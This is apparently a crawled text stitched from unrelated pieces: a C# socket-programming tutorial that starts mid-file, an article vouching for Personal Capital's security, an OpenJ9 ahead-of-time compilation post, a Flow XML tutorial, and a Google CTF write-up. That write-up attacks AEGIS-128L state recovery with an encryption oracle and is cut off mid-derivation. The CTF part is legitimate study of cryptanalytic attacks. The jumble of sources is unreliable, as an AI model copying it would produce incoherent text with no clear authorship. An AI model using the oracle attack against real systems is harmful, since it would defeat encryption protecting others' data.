public static void Main(){
listener = new TcpListener(2055);
listener.Start();
#if LOG
Console.WriteLine("Server mounted, listening to port 2055");
#endif
for(int i = 0;i < LIMIT;i++){
Thread t = new Thread(new ThreadStart(Service));
t.Start();
}
}
public static void Service(){
while(true){
Socket soc = listener.AcceptSocket();
//soc.SetSocketOption(SocketOptionLevel.Socket,
// SocketOptionName.ReceiveTimeout,10000);
#if LOG
Console.WriteLine("Connected: {0}",
soc.RemoteEndPoint);
#endif
try{
Stream s = new NetworkStream(soc);
StreamReader sr = new StreamReader(s);
StreamWriter sw = new StreamWriter(s);
sw.AutoFlush = true; // enable automatic flushing
sw.WriteLine("{0} Employees available",
ConfigurationSettings.AppSettings.Count);
while(true){
string name = sr.ReadLine();
if(name == "" || name == null) break;
string job =
ConfigurationSettings.AppSettings[name];
if(job == null) job = "No such employee";
sw.WriteLine(job);
}
s.Close();
}catch(Exception e){
#if LOG
Console.WriteLine(e.Message);
#endif
}
#if LOG
Console.WriteLine("Disconnected: {0}",
soc.RemoteEndPoint);
#endif
soc.Close();
}
}
}
Here is the content of the configuration file (emptcpserver.exe.config) for the above application:
<configuration>
<appSettings>
<add key = "john" value="manager"/>
<add key = "jane" value="steno"/>
<add key = "jim" value="clerk"/>
<add key = "jack" value="salesman"/>
</appSettings>
</configuration>
The code between #if LOG and #endif will be added by the compiler only if the symbol LOG is defined during compilation (conditional compilation). You can compile the above program either by defining the LOG symbol (information is logged on the screen):
• csc /D:LOG emptcpserver.cs
or without the LOG symbol (silent mode):
• csc emptcpserver.cs
Mount the server using the command start emptcpserver.
To test the server you can use: telnet localhost 2055.
Or, we can create a client program. Basic steps for creating a TCP/IP client are as follows:
1. Create a System.Net.Sockets.TcpClient using the server’s host name and port:
TcpClient client = new TcpClient(host, port);
2. Obtain the stream from the above TcpClient:
Stream s = client.GetStream();
3. Communicate with the server using the predefined protocol.
4. Close the Stream:
s.Close();
5. Close the connection:
client.Close();
The program below (emptcpclient.cs) communicates with EmployeeTCPServer:
using System;
using System.IO;
using System.Net.Sockets;
class EmployeeTCPClient{
public static void Main(string[] args){
TcpClient client = new TcpClient(args[0],2055);
try{
Stream s = client.GetStream();
StreamReader sr = new StreamReader(s);
StreamWriter sw = new StreamWriter(s);
sw.AutoFlush = true;
Console.WriteLine(sr.ReadLine());
while(true){
Console.Write("Name: ");
string name = Console.ReadLine();
sw.WriteLine(name);
if(name == "") break;
Console.WriteLine(sr.ReadLine());
}
s.Close();
}finally{
// code in the finally block is guaranteed to execute
// whether or not an exception occurs in the try block
client.Close();
}
}
}
1.3 Multicasting with UDP
Unlike TCP, UDP is connectionless, i.e. data can be sent to multiple receivers using a single socket. Basic UDP operations are as follows:
1. Create a System.Net.Sockets.UdpClient either using a local port or remote host and remote port:
UdpClient client = new UdpClient(local_port);
or
UdpClient client = new UdpClient(remote_host, remote_port);
2. Receive data using the above UdpClient:
System.Net.IPEndPoint ep = null;
byte[] data = client.Receive(ref ep);
The byte array data will contain the data that was received, and ep will contain the address of the sender.
3. Send data using the above UdpClient.
If the remote host name and the port number have already been passed to the UdpClient through its constructor, then send byte array data using:
client.Send(data, data.Length);
Otherwise, send byte array data using IPEndPoint ep of the receiver:
client.Send(data, data.Length, ep);
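Because UDP carries raw bytes, strings must be converted with an Encoding before Send and back after Receive. A round-trip sketch (the class name EncodingDemo is hypothetical):

```csharp
using System;
using System.Text;

class EncodingDemo {
    public static void Main() {
        // Encode a string into the byte[] form that UdpClient.Send expects
        byte[] data = Encoding.ASCII.GetBytes("john");
        Console.WriteLine(data.Length); // prints 4 (one byte per ASCII char)
        // Decode the byte[] form that UdpClient.Receive returns
        string name = Encoding.ASCII.GetString(data);
        Console.WriteLine(name);        // prints john
    }
}
```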
The program below (empudpserver.cs) receives the name of an employee from a remote client and sends it back the job of that employee using UDP:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Configuration;
class EmployeeUDPServer{
public static void Main(){
UdpClient udpc = new UdpClient(2055);
Console.WriteLine("Server started, servicing on port 2055");
IPEndPoint ep = null;
while(true){
byte[] rdata = udpc.Receive(ref ep);
string name = Encoding.ASCII.GetString(rdata);
string job = ConfigurationSettings.AppSettings[name];
if(job == null) job = "No such employee";
byte[] sdata = Encoding.ASCII.GetBytes(job);
udpc.Send(sdata,sdata.Length,ep);
}
}
}
Here is the content of the configuration file (empudpserver.exe.config) for above application:
<configuration>
<appSettings>
<add key = "john" value="manager"/>
<add key = "jane" value="steno"/>
<add key = "jim" value="clerk"/>
<add key = "jack" value="salesman"/>
</appSettings>
</configuration>
The next program (empudpclient.cs) is a UDP client to the above server program:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
class EmployeeUDPClient{
public static void Main(string[] args){
UdpClient udpc = new UdpClient(args[0],2055);
IPEndPoint ep = null;
while(true){
Console.Write("Name: ");
string name = Console.ReadLine();
if(name == "") break;
byte[] sdata = Encoding.ASCII.GetBytes(name);
udpc.Send(sdata,sdata.Length);
byte[] rdata = udpc.Receive(ref ep);
string job = Encoding.ASCII.GetString(rdata);
Console.WriteLine(job);
}
}
}
UDP also supports multicasting i.e. sending a single datagram to multiple receivers. To do so, the sender sends a packet to an IP address in the range 224.0.0.1 – 239.255.255.255 (Class D address group). Multiple receivers can join the group of this address and receive the packet. The program below (stockpricemulticaster.cs) sends a datagram every 5 seconds containing the share price (a randomly calculated value) of an imaginary company to address 230.0.0.1:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
class StockPriceMulticaster{
static string[] symbols = {"ABCD","EFGH", "IJKL", "MNOP"};
public static void Main(){
UdpClient publisher = new UdpClient("230.0.0.1",8899);
Console.WriteLine("Publishing stock prices to 230.0.0.1:8899");
Random gen = new Random();
while(true){
int i = gen.Next(0,symbols.Length);
double price = 400*gen.NextDouble()+100;
string msg = String.Format("{0} {1:#.00}", symbols[i], price);
byte[] sdata = Encoding.ASCII.GetBytes(msg);
publisher.Send(sdata,sdata.Length);
System.Threading.Thread.Sleep(5000);
}
}
}
Compile and start stockpricemulticaster.
The next program (stockpricereceiver.cs) joins the group of address 230.0.0.1, receives 10 stock prices and then leaves the group:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
class StockPriceReceiver{
public static void Main(){
UdpClient subscriber = new UdpClient(8899);
IPAddress addr = IPAddress.Parse("230.0.0.1");
subscriber.JoinMulticastGroup(addr);
IPEndPoint ep = null;
for(int i=0; i<10;i++){
byte[] pdata = subscriber.Receive(ref ep);
string price = Encoding.ASCII.GetString(pdata);
Console.WriteLine(price);
}
subscriber.DropMulticastGroup(addr);
}
}
Compile and run stockpricereceiver.
License
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
About the Author
.NETian
Software Developer (Senior) Buyagift Limited.
United Kingdom United Kingdom
Having completed my Bsc(Hons) in Computing from Staffordshire University U.K and Masters in Software Development and Security from Birmingham City University. I am now working as a Senior Software Engineer at Buyagift Limited - UK.
Mubashir Afroz.
Buyagift Ltd.
www.buyagift.co.uk
---------------------
Article Copyright 2005 by .NETian
Everything else Copyright © CodeProject, 1999-2015
Wallet Hacks
Is Personal Capital Safe? Personal Capital Security Explained
I use Personal Capital on a monthly basis to collect my net worth information. I've been at it for over a decade.
When I tell people I use a tool to do it, they all ask me the same question – is Personal Capital safe?
Security is one of the biggest concerns people have with any financial aggregator or tool. Whether it's Mint, Personal Capital, or some other service – putting your data into the “cloud” can be unnerving. This is especially true given how many hacks we've seen recently. Equifax, one of the biggest credit reporting agencies, was hacked and 143 million consumers had their data stolen. It was enormous.
How do you know that your data is going to be safe at another company?
It comes down to two key parts – how do they safeguard your information when they have it and how do they safeguard the transmission of your information while they get it.
Two Key Security Areas
When it comes to financial apps and security, there are two key pieces to look at:
1. How Safe is My Data – When you give the tool your data, how is it stored and protected? What is stored and where is it stored? How are the employees monitored to prevent any kind of theft?
2. How Safe is the Connection – When you communicate with the tool, how secure is that connection? When you log in, when you view your data, when you update anything, when you give them your credentials… the transmission of that data is subject to risk.
The information you put into the system has to be safe in its place of storage. The way you communicate that information must also be secure.
How Safe Is My Data in the Cloud?
One of the biggest concerns people have with tools like Personal Capital is having their data in the “cloud.”
I reached out to David M. Parker, Asst. Prof., Div. of Accounting & Finance and Director, Center for the Study of Fraud and Corruption at Saint Xavier University, for his thoughts on services like Mint and Personal Capital. He shared some valuable thoughts on how to weigh the potential risks and rewards of using cloud-based tools:
David M. Parker, Asst. Prof., Div. of Accounting & Finance and Director, Center for the Study of Fraud and Corruption
With regard to general thoughts about storing data in the cloud by giving your data to Amazon, Microsoft, Dropbox, Equifax, your bank, Google, Facebook, or whoever… is it safe? Recent news items reveal the many, many companies that have suffered data breaches at the hands of cybercriminals.
Can your data be stolen if you hand it over to the cloud? Yes.
So, you decide to keep your data safe at home. Can it be stolen? Also yes. Cybercriminals can break into your home computer, your home wi-fi, your Internet-enabled thermostat or doorbell, etc.
Points in favor of the cloud include that a big company like Amazon or Microsoft might have more resources and be better at defensive security than you are at home. And, certainly, it is in the best interest of their business to do their best to remain secure. They also offer redundant storage to an extent you would not have just storing your data at home, where your hard drive could blow up or your house could burn down with your data in it. So, it is often an acceptable risk.
I have no direct personal experience with Mint or Personal Capital. My understanding of these third party financial data aggregator services is that they work by gathering all your financial data into one place and offering their clients the resulting convenience of the nice graphs and charts. This means they need to work with your bank, broker, etc. to get access to your transactions. The extent and type of access they will be able to get may depend on whether the financial institution views them as a partner or a competitor.
An issue that comes to my mind is the size of the attack surface. If your bank and your aggregator both have a copy of your information, it gives the criminal two possible targets from which to steal it. Also, if all of your information is collected at one spot, rather than having to break into multiple accounts, the criminal now has one-stop shopping.
There will always be risks. No system will ever be perfectly secure. There will always be vulnerabilities and bad people willing to exploit them. But, it always comes down to an individual judgment about whether the risk is reasonable or minimal compared with the benefit of the service.
Your data isn't 100% safe at home and it isn't 100% safe in the cloud.
But the companies that you trust with your data will have safeguards in place (“defensive security”) to protect you.
Let's take a closer look at Personal Capital and what they do to secure your data.
How Safe Is My Data at Personal Capital?
Are you worried about your data being stored on Personal Capital servers?
The guy you want to talk to when it comes to security at Personal Capital is Fritz Robbins. He is their Chief Technology Officer and Chief Information Officer. He has over 20 years of experience in the field, including a three-year stint as a System Architect at RSA Security and 8 years running his own full-lifecycle software engineering company. He holds an M.S. in Computer Science from Stanford University to boot.
(also, for what it's worth, Personal Capital's Founder Bill Harris co-founded PassMark Security, a company that built online authentication systems used by most major banks, and Fritz Robbins was with that company as well)
I asked Fritz about security and he mentioned a few of the points I'll dive deeper on below:
Fritz Robbins, CTO/CIO of Personal Capital
Our point of view is that viewing your banking and brokerage accounts via Personal Capital is *safer* than going directly to the banking/brokerage site from your browser. You touched on many of the reasons why:
1. Your credentials are stored in a secure data center versus always being transmitted via the user's (generally less-secure) browser
2. The connection is read-only and no money can be transferred out of your banking/brokerage account via Personal Capital, and your banking/brokerage passwords are never returned to your browser from our servers.
3. Our service gives you notification of all banking/brokerage transactions (via email or mobile push notifications) that make it easy for you to monitor your banking/brokerage accounts for fraud, all in one place!
Not for nothing but knowing the security chops of the team behind Personal Capital gives me confidence they're on top of their game.
There are two ways that Personal Capital keeps your data safe:
Quick Primer on Encryption
(click to expand this section & read a primer on encryption)
Encryption is fascinating. The basic idea behind encryption is that you have two keys, a public key and a private key.
If you want to encrypt something that only I can read, you need my public key. You encrypt your message with my public key and then send me the encrypted message. The only way to decrypt it is with my private key (which I would never share). If I want to send you something encrypted, I need your public key to encrypt it; then only you can decrypt it using your private key.
Fundamentally, modern encrypted communications all work this way. There are variations to make it more secure, depending on your needs (more hoops = more secure = more time).
For example, one classic variation is to rely on “session” keys rather than “permanent” ones. It's like using a temporary credit card number rather than your actual one. For every conversation, you create new keys that expire after the session is over.
Another variation is how we get the public keys to one another. We can just publish them, and that's typically fine, or we can use what's known as Ephemeral Elliptic Curve Diffie-Hellman (ECDHE) key exchange. It produces temporary keys that only the two of us would use for this single session. This is what Personal Capital uses.
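As a concrete (and deliberately insecure) illustration of the key-exchange idea, here is textbook Diffie-Hellman with the classic toy parameters P = 23 and G = 5. This is purely for intuition; real systems, including anything Personal Capital uses, rely on vetted elliptic-curve groups with enormously larger parameters.

```python
# Textbook Diffie-Hellman with deliberately tiny numbers -- illustration only.
P, G = 23, 5          # public prime modulus and generator (toy-sized!)

a = 6                 # Alice's private key (kept secret)
b = 15                # Bob's private key (kept secret)

A = pow(G, a, P)      # Alice publishes G^a mod P
B = pow(G, b, P)      # Bob publishes G^b mod P

# Each side raises the other's public value to its own private exponent:
shared_alice = pow(B, a, P)   # (G^b)^a = G^(ab) mod P
shared_bob = pow(A, b, P)     # (G^a)^b = G^(ab) mod P
assert shared_alice == shared_bob
print(shared_alice)           # 2
```

An eavesdropper sees P, G, A, and B but cannot feasibly derive the shared secret; for a "session" variant, both parties simply pick fresh private exponents for each conversation.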
AES-256 is seriously serious encryption.
When you enter your bank credentials into Personal Capital, they encrypt them with AES-256 and multi-layer key management, which includes rotating user-specific keys and salts. AES is the Advanced Encryption Standard, the gold standard as determined by NIST, the United States National Institute of Standards and Technology; the 256 refers to the key length in bits, the longest AES supports. It is also the same encryption used by the US Government.
They never store your financial login credentials. That data is encrypted and stored at Envestnet Yodlee, a platform that powers a laundry list of financial services and wealth management tools and companies. Yodlee is periodically audited by the Office of the Comptroller of the Currency, and its security processes are documented publicly.
As for internal access controls, no one at Personal Capital has access to your credentials. Zero.
How Safe is the Connection with Personal Capital?
Your data is safe and encrypted on their servers, but it needs to get there first without someone peeking.
That's where encryption plays yet another role.
All of your online interaction with Personal Capital is encrypted, so no one can decipher what you're communicating with Personal Capital servers. They prefer TLS 1.2 but also support TLS 1.1 and TLS 1.0; they do not allow other, less-secure protocols. In encryption, you need to exchange keys during a session of communication, and they use ECDHE key exchange for Perfect Forward Secrecy (read the encryption primer for more information).
They also require 2-factor authentication. This means that if you log in from an unknown or new device, they will confirm it's you via your phone or email (you pick when you set it up). I feel it's a must for any financial institution, and there are some banks that don't have this yet!
Finally, their apps are tested by NowSecure and the AppSecure certification process.
How Personal Capital Protects Against Fraud
To this point, we've talked only about how Personal Capital protects you and your data. What if the data is bad?
What if your credit card gets used in a fraudulent way? Personal Capital monitors your transactions and can send you a Daily Transaction Monitor email that lists everything it has seen that day. Rather than reviewing your statement at the end of the month, you review it daily when your memory is fresh. You may not remember a transaction from two weeks ago but if it happened today, you will.
I personally set transaction notifications for any amount above $0 or $1 (depends on the card, some won't let you do $0), but this is a good alternative if you feel that level of notifications is overkill (it probably is).
Is Personal Capital Safe?
Yes, Personal Capital could actually be safer than your bank.
(This is the concern that worries people the most.)
How is Personal Capital going to be safer than your bank?
They do everything your bank does plus more, in some cases:
1. It's read-only. When you connect your accounts to Personal Capital, Personal Capital can't do anything except read the data. You can't transfer funds.
2. It's not an appealing target. It's read-only and your credentials are stored elsewhere (Yodlee).
3. It has 2-factor authentication. Not all banks have 2-factor authentication (stunning but true), but Personal Capital does. It's an extra and necessary layer of security.
4. They encrypt everything with 256-bit keys. Cracking that by brute force would take on the order of a billion billion years.
5. One point of access for multiple banks means you don't have to log into each of those banks individually. In fact, when you log into your Personal Capital, you never have to enter your bank credentials so it never gets transmitted. If your computer is compromised by malware or a keylogger, your financial accounts are secure.
Nothing Is 100% Safe
As they say, the only thing that's 100% safe is abstinence.
Nothing else is 100% safe. Personal Capital is not 100% safe.
If you add another layer to the system, it's another layer that can be attacked.
That said, you have to weigh the benefits you get from using them (you can read my Personal Capital review to see everything I like and dislike about them) against the small chance they could be attacked.
I am personally comfortable with using them but that's ultimately for you to decide. They have put all the proper protections in place, often higher standards than is required, and that's good enough for me.
Check out Personal Capital
Intro to Ahead Of Time Compilation
This post is meant to serve as an introduction to Ahead Of Time (AOT) compilation in OpenJ9. It does not delve too deeply into the technical details and subtleties involved in implementing AOT compilations; these will be covered in future blog posts. In this post, AOT can refer to either the AOT Compilation or the infrastructure surrounding it.
What is an AOT Compilation?
AOT compilation, in the context of OpenJ9, generally refers to a Java method implemented as bytecodes that was compiled and stored to the Shared Class Cache (SCC). An AOT compilation is performed by the compiler in one JVM instance and subsequently gets used by the compiler in another JVM instance1. This is in direct contrast to Just In Time (JIT) compilation, which implies that the compilation of a Java bytecode method was performed by the compiler in the currently running JVM instance and not shared with any other JVM instances.
Why have AOT Compilations?
The benefits of AOT compilations are improved application startup time, and reduced CPU usage. For more information on the benefits of AOT code, take a look at some OpenJ9 Performance Results. As you can imagine, if a bunch of Java bytecode methods have already been compiled, then the compiler does not need to waste CPU cycles compiling those methods again, and instead, the JVM can just load those methods and start running them – at least that’s the simplified idea. In this manner, it is theoretically possible to get an application up to its peak steady state performance much faster because there is no need to wait for the JVM to “warm up”. But, of course, it’s more complicated than that.
How to AOT?
At a very high level, making use of AOT involves two main steps:
1. Populate the SCC with AOT compiled code
2. Load the AOT compiled code and run it
Let’s take a closer look at these two steps.
Populate the SCC with AOT compiled code
To populate the SCC with AOT compiled code at least one JVM needs to actually do the work to compile all the Java bytecode methods. Thus, while AOT does save CPU usage and improves startup, that is only true for every subsequent JVM invocation, known as the “warm run”; the very first run in which the JVM does the compilation work is known as the “cold run”.
Now that we’ve sorted out that technicality, we need to deal with the more fundamental problem of getting AOT compilations functional. If a Java bytecode method was compiled by one JVM, how can a different JVM run that code as is? Well, in order to allow another JVM to run AOT code, two actions need to be performed.
1. All assumptions made during the compilation of a method need to be validated to ensure they are still true.
2. All appropriate code locations need to be relocated in order to be capable of running in a different address space.
Thus, a fundamental difference between an AOT and a JIT compilation is that the former requires the creation of Validation and Relocation Records.
Validation Records are used to ensure that the assumptions made about the environment in the “cold run” are consistent with the environment in the “warm run”. One example is to ensure that the class hierarchy of some class in the “warm run” is the same as what it was in the “cold run”. An even simpler example is to ensure that the architecture version of the machine where the AOT code is loaded is compatible with the code2.
Relocation Records are used to relocate (i.e. update) all locations in the code body that contain references to the old address space (i.e. the address space of the “cold run”) with the appropriate references that are valid in the current address space (i.e. the address space of the “warm run”). Thus, this ensures that any references to java classes, java methods, or static addresses are valid in the “warm run”.
With these Relocation and Validation records, the compiler can now generate Relocatable Code, which can be stored into the SCC for use by a different JVM.
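To illustrate the relocation idea (this is not OpenJ9's actual implementation), here is a minimal sketch. The record format (offset, symbol name), the symbol table, and all addresses below are hypothetical, invented purely for illustration; real OpenJ9 relocation records are typed and considerably richer.

```python
# Simplified sketch of applying relocation records: each record names an
# offset in the compiled code body and the symbol whose current-run address
# should be patched in at that offset.
import struct

def relocate(code: bytearray, records, symbol_table):
    """Patch each recorded offset with the symbol's address in *this* JVM."""
    for offset, symbol in records:
        address = symbol_table[symbol]           # resolve in the current run
        struct.pack_into("<Q", code, offset, address)
    return code

# The "cold run" left 8-byte placeholders at offsets 0 and 16:
code = bytearray(24)
records = [(0, "java/lang/String"), (16, "someStaticField")]

# The "warm run" has these entities at different (hypothetical) addresses:
symbols = {"java/lang/String": 0x7F00DEAD0000, "someStaticField": 0x7F00BEEF0010}

relocate(code, records, symbols)
print(hex(struct.unpack_from("<Q", code, 0)[0]))   # 0x7f00dead0000
```

Validation records would be consumed analogously before this step: each one re-checks an assumption (class hierarchy shape, hardware features, etc.) and aborts the load if it no longer holds.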
Load the AOT compiled code and run it
As mentioned above, because the code stored in the SCC is not valid in the current environment, the JVM that loads this code needs to first relocate the code before it can run it. This involves first going through all the Validation Records to ensure that all the assumptions made in the “cold run” are still valid, and then going through all the Relocation Records to materialize the data that is valid in the current environment and patching the appropriate locations (specified by the Relocation Records) with the valid data.
With this done, the JVM can now run the code.
An Important Distinction
Static AOT involves taking a collection of classes and compiling every method in those classes prior to running any java code. Dynamic AOT, on the other hand, involves determining what methods to compile based on runtime characteristics.
OpenJ9 implements Dynamic AOT. Just as with JIT compilations, the compiler only AOT compiles methods that have been executed a certain number of times.
Conclusion
Hopefully this gives you a general understanding of the AOT process. If you’re interested in the deep technical details, stay tuned for further blog posts.
Further Reading
1. Actually, the JVM instance that compiles the AOT code also loads and runs that code. However, the code is in a form that allows it to also be loaded and run by other JVM instances.
2. In OpenJ9, this isn’t validated using a Validation Record, but rather through something known as the Feature Flags which is beyond the scope of this blog post but will be described in future blog posts.
Flow Hello World in XML
Modeling a Flow
The main container in Flow looks as follows:
<Flow name="FlowName" version="1.0.0.0">
<Declaration>
<!-- section to define parameters: Variables or Types -->
</Declaration>
<Nodes>
<!-- Nodes and Transitions come in this section -->
</Nodes>
</Flow>
where you replace FlowName in the name attribute with your own flow's name. In the Declaration section, you can define Parameters (Variables or Types).
Mandatory Nodes
All Flows must have at least two Nodes:
1. Start node
2. End node
And a Transition that connects the Nodes to each other:
<Flow name="FlowName" version="1.0.0.0">
<Nodes>
<Start name="startNode">
<Transition name="tr1" to="endNode"/>
</Start>
<End name="endNode" />
</Nodes>
</Flow>
In this example, we simply defined a Flow that has two nodes and one transition that connects the Start node to the End node. Please note that the End Node cannot have any Transitions.
Also, it is important that all names in a Flow are unique (across Nodes, Transitions, etc.).
Adding an Activity
The simplest way to add a task to be achieved in a Flow is using an Activity node.
<Flow name="Flow1" version="1.0.0.0">
<Nodes>
<Start name="nodeStart">
<Transition name="tr0" to="Activity1" />
</Start>
<Activity name="Activity1">
<Transition name="tr1" to="nodeEnd" />
</Activity>
<End name="nodeEnd" />
</Nodes>
</Flow>
This models a simple flow: the Start node transitions to Activity1, which then transitions to the End node.
An Activity in a flow can either:
1. Execute an expression (the expression parameter of an Activity node), or
2. Be linked to other models:
1. Procedural (Activity node)
2. Validation (Validator node)
3. Decision Table (Decision Table node)
4. Natural Language (Natural Language node)
5. Decision Graph (DRG node)
6. Information Requirement Diagram (IRD node)
7. Sub-Flow (CallFlow)
Adding Hello World Action
In this example, we link the activity to procedural logic. The simplest way to attach an action to an Activity node is to reference a procedure from the node.
Let’s say we have the following procedure saved as HelloWorld.xml
<Procedure name="hello">
<Declaration>
<Using path="System.Console"/>
</Declaration>
<CallMethod method='Console.WriteLine("From Flow: hello world!")'/>
</Procedure>
Then, using CallProc, we can reference the procedure from the node. Make sure that the Flow and Procedure models are located in the same directory.
Complete Flow Model
<Flow name="FlowRuleFlow" version="1.0.0.0">
<Nodes>
<Start name="nodeStart">
<Transition name="tr0" to="Activity1" />
</Start>
<Activity name="Activity1">
<CallProc contextMode="New" resultCopyMode="None">
<ProcSource uri="HelloWorld.xml" />
</CallProc>
<Transition name="tr1" to="nodeEnd" />
</Activity>
<End name="nodeEnd" />
</Nodes>
</Flow>
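Outside of any Flow tooling, a few lines of Python with the standard-library ElementTree can sanity-check the rules described above (unique names, no transitions out of the End node, no dangling transition targets). This is just an illustration, not part of the product:

```python
# Quick structural sanity check of a Flow model using stdlib ElementTree.
import xml.etree.ElementTree as ET

FLOW = """<Flow name="FlowRuleFlow" version="1.0.0.0">
  <Nodes>
    <Start name="nodeStart"><Transition name="tr0" to="Activity1"/></Start>
    <Activity name="Activity1"><Transition name="tr1" to="nodeEnd"/></Activity>
    <End name="nodeEnd"/>
  </Nodes>
</Flow>"""

root = ET.fromstring(FLOW)
nodes = list(root.find("Nodes"))
names = [n.get("name") for n in nodes]
assert len(names) == len(set(names)), "node names must be unique"

for node in nodes:
    # End nodes cannot have any Transitions:
    assert node.tag != "End" or node.find("Transition") is None
    # Every transition must point at an existing node:
    for tr in node.findall("Transition"):
        assert tr.get("to") in names, f"dangling transition {tr.get('name')}"

print(names)   # ['nodeStart', 'Activity1', 'nodeEnd']
```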
Executing a Flow
Executing the flow is easy. There are just a couple of steps that need to be followed.
1. Loading a Runtime engine
2. Calling the Run method of the engine
private void RunHelloWorld()
{
//TODO: insert your path to the flow xml model source below, and replace YOUR_PATH_GOES_HERE with your path to your xml model source
string flowPath=YOUR_PATH_GOES_HERE;
var engine = RuntimeEngine.FromXml(File.OpenRead(flowPath));
// execute!
engine.Run();
}
Updated on December 12, 2023
I was teamed-up with @blackb6a on Google CTF this time. I have solved 7 challenges alone and 3 challenges with my teammates.
In particular, Oracle is a crypto challenge with 13 solves. It kept me busy for 12 hours. All in all, it was a great experience in terms of learning, but my liver hurts. This writeup may be quite computation-heavy, simply because I would like to make everything clear.
Challenge Summary
There are two parts of the challenges. In the first part, we are required to recover an internal state for AEGIS-128L given the encryption oracle. For the second part, we are required to forge a ciphertext given an error oracle from decryption.
Solution
Part I: A brief summary of the state in AEGIS-128L
AEGIS-128L has an internal state that is initially computed solely from the key and the IV. It is 128 bytes, broken into eight 16-byte blocks. Say $S_i$ is updated to $S_{i+1}$ given a 32-byte payload $M$. Define $S_i = (s_{i, 0}, s_{i, 1}, ..., s_{i, 7})$ and $M = (m_0, m_1)$. We have:
• $s_{i+1, 0} \leftarrow \text{AESEnc}(s_{i, 7}, s_{i, 0}) \oplus m_0$,
• $s_{i+1, 4} \leftarrow \text{AESEnc}(s_{i, 3}, s_{i, 4}) \oplus m_1$, and
• $s_{i+1, j} \leftarrow \text{AESEnc}(s_{i, j-1}, s_{i, j})$ for $j = 1, 2, 3, 5, 6, 7$.
But what is AESEnc? Let's see the implementation.
def aes_enc(s: block, t: block) -> block:
"""Performs the AESENC operation with tables."""
t0 = (te0[s[0]] ^ te1[s[5]] ^ te2[s[10]] ^ te3[s[15]])
t1 = (te0[s[4]] ^ te1[s[9]] ^ te2[s[14]] ^ te3[s[3]])
t2 = (te0[s[8]] ^ te1[s[13]] ^ te2[s[2]] ^ te3[s[7]])
t3 = (te0[s[12]] ^ te1[s[1]] ^ te2[s[6]] ^ te3[s[11]])
s = _block_from_ints([t0, t1, t2, t3])
return _xor(s, t)
Well... we will go through this later. Let's introduce how keystreams are generated from the state. It is (relatively) simple. The keystream $(k_{i, 0}, k_{i, 1})$ for the $i$-th round is given by:
\[ k_{i, 0} = (s_{i, 2} \wedge s_{i, 3}) \oplus s_{i, 1} \oplus s_{i, 6}, \\ k_{i, 1} = (s_{i, 6} \wedge s_{i, 7}) \oplus s_{i, 5} \oplus s_{i, 2}. \]
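The keystream rule above can be transcribed into a few lines of Python, treating each state word as 16 raw bytes (the helper names here are my own, not from the challenge code):

```python
# Bytewise XOR / AND over 16-byte blocks, and the AEGIS-128L keystream rule.
def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _and(a: bytes, b: bytes) -> bytes:
    return bytes(x & y for x, y in zip(a, b))

def keystream(s):
    """s = (s0, ..., s7): return the two 16-byte keystream blocks."""
    k0 = _xor(_xor(_and(s[2], s[3]), s[1]), s[6])   # (s2 & s3) ^ s1 ^ s6
    k1 = _xor(_xor(_and(s[6], s[7]), s[5]), s[2])   # (s6 & s7) ^ s5 ^ s2
    return k0, k1
```

Note that the keystream mixes only six of the eight state words, which is exactly what the attack below exploits: if two encryptions agree on $s_2, s_3, s_6, s_7$, the keystream difference isolates $s_1$ (and $s_5$).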
Part II: Recovering part of the state
Now we are given that the key and IV are unchanged. This implies that the initial state, i.e., $s_{00}, s_{01}, ..., s_{07}$, is constant too.
Suppose that we have two 96-byte messages $M^{(1)}$ and $M^{(2)}$ in which only the first two blocks differ (formally, if $M^{(k)} := (m^{(k)}_{00}, m^{(k)}_{01}, ..., m^{(k)}_{21})$, then $m^{(1)}_{ij} = m^{(2)}_{ij}$ if and only if $i \neq 0$).
The following table summarizes which of the $s_{ij}$'s that would be different (marked by an !), when encrypting $M^{(1)}$ and $M^{(2)}$ respectively.
$i$ \ $j$ 0 1 2 3 4 5 6 7
0
1 ! !
2 ! ! ! !
What does this imply? Knowing that $s^{(1)}_{2,j} = s^{(2)}_{2,j}$ for $j = 2, 3, 6, 7$. Let's look closely on the last 32 bytes of the keystream:
\[ \begin{aligned} k^{(1)}_{20} \oplus k^{(2)}_{20} &= m^{(1)}_{20} \oplus c^{(1)}_{20} \oplus m^{(2)}_{20} \oplus c^{(2)}_{20} \\ &= \left[ (s^{(1)}_{22} \wedge s^{(1)}_{23}) \oplus s^{(1)}_{21} \oplus s^{(1)}_{26} \right] \oplus \left[ (s^{(2)}_{22} \wedge s^{(2)}_{23}) \oplus s^{(2)}_{21} \oplus s^{(2)}_{26} \right] \\ &= s^{(1)}_{21} \oplus s^{(2)}_{21}. \end{aligned} \]
And similarly $k^{(1)}_{21} \oplus k^{(2)}_{21} = s^{(1)}_{25} \oplus s^{(2)}_{25}$.
Why is it useful? Let's define a new function, p:
def p(s: block) -> block:
t0 = (te0[s[0]] ^ te1[s[5]] ^ te2[s[10]] ^ te3[s[15]])
t1 = (te0[s[4]] ^ te1[s[9]] ^ te2[s[14]] ^ te3[s[3]])
t2 = (te0[s[8]] ^ te1[s[13]] ^ te2[s[2]] ^ te3[s[7]])
t3 = (te0[s[12]] ^ te1[s[1]] ^ te2[s[6]] ^ te3[s[11]])
return _block_from_ints([t0, t1, t2, t3])
Déjà vu? It is more or less the same as AESEnc. We can state that AESEnc(s, t) == p(s) ^ t. Looking even more closely, one can observe that the first four bytes of p's output depend solely on bytes 0, 5, 10 and 15 of s.
Knowing this, we can further expand $k^{(1)}_{20} \oplus k^{(2)}_{20}$:
